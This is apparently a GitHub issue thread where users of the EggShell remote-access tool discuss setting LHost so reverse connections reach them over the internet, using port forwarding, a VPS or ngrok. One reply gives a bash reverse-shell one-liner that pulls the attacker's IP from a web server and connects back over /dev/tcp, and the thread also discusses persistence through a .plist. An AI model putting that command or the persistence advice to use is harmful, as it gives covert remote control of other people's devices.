LHost parameter

[AstroOrbis]

What would I put in the LHost section? Anything with 192.168 is local, and sending this over to a device not connected to the same network as me would be useless... halp lmao

[acheong08]

If you have port forwarding, put your public IP. If you're just pentesting at home, use your local ip. Else, you can also host a VPS and run eggshell there.

[AstroOrbis]

I'm stupid, wats a VPS... sry its late and I'm tired kek

[acheong08]

Virtual private server. Offered by DigitalOcean and many more. It's a server with SSH access and a public facing IP. I own one on DigitalOcean to host my website, IRC, VPN, and DNS resolver. It's quite multi-purpose.

[acheong08]

If you have a student email address, you can get up to $100 free credit on DigitalOcean for 12 months free by getting the Github Student Developer Pack.

[rpwnage]

Well, you could try ngork to allow connections outside of your local network. Didn't try it yet but it should work 🙂

[AstroOrbis]

So I put in the Ngrok address for the LHost?

[acheong08]

That would also work. Tried it today. However, ngrok doesn't work with the persistence module (for obvious and unfixable reasons unless you pay for the premium).

[AstroOrbis]

What if there was a new persistence module that got the IP from a server that you run, then connects normally? And would port forwarding also work?

[acheong08]

Yes. In bash, that would be: bash &> /dev/tcp/$(curl http://example.com/ip.txt)/4444 0>&1 Pastebin would be useful for this.

[acheong08]

I'm not sure but if you have your own domain name, a CNAME record might work

[acheong08]

I am currently using a server with wireguard and port forwarding for getting reverse connections Would have to edit the persistence .plist to do that though